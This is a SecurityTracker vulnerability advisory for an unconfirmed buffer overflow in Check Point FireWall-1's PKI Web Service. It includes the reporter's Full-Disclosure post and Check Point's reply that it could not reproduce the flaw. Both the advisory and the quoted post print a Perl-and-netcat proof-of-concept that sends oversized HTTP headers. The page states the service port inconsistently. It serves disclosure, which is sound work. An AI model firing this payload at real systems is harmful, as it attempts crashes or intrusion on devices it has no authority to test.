SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Firewall)  >   FireWall-1/VPN-1 Vendors:   Check Point
[Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact
SecurityTracker Alert ID:  1021948
SecurityTracker URL:  http://securitytracker.com/id/1021948
CVE Reference:   CVE-2009-1227   (Links to External Site)
Updated:  Apr 10 2009
Original Entry Date:  Mar 30 2009
Impact:   Not specified
Exploit Included:  Yes  

Description:   A vulnerability was reported in FireWall-1/VPN-1 in the PKI Web Service. The impact was not specified. [Editor's note: This vulnerability is unconfirmed.]

A remote user can reportedly send a specially crafted HTTP header 'Authorization' or 'Referer' value to the PKI Web Service on TCP port 18624 to trigger a buffer overflow.

A demonstration exploit [Perl command] request is provided:

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

BugsNotHugs reported this vulnerability.

The vendor has provided the following response:

"Check Point Security Alert Team has analyzed this report. We ve tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs.

The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack.

We consider this attack to pose no risk to Check Point customers."

[Editor's note: The original reporter stands by the report and indicates that the behavior was observed during a penetration test two years ago against an unknown version of the product. Note that the NG FP2 product was released in April 2002.]

Impact:   The impact was not specified.
Solution:   [Editor's note: The vendor has tested versions NG FP2 and later and cannot reproduce the reported behavior. The vendor has conducted code analysis on versions NG FP2 and later and indicates that the product is not affected. See the Description section for the vendor's response.]
Vendor URL:  www.checkpoint.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Mon, 30 Mar 2009 02:16:17 -0600
Subject:  [Full-disclosure] Check Point Firewall-1 PKI Web Service HTTP

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC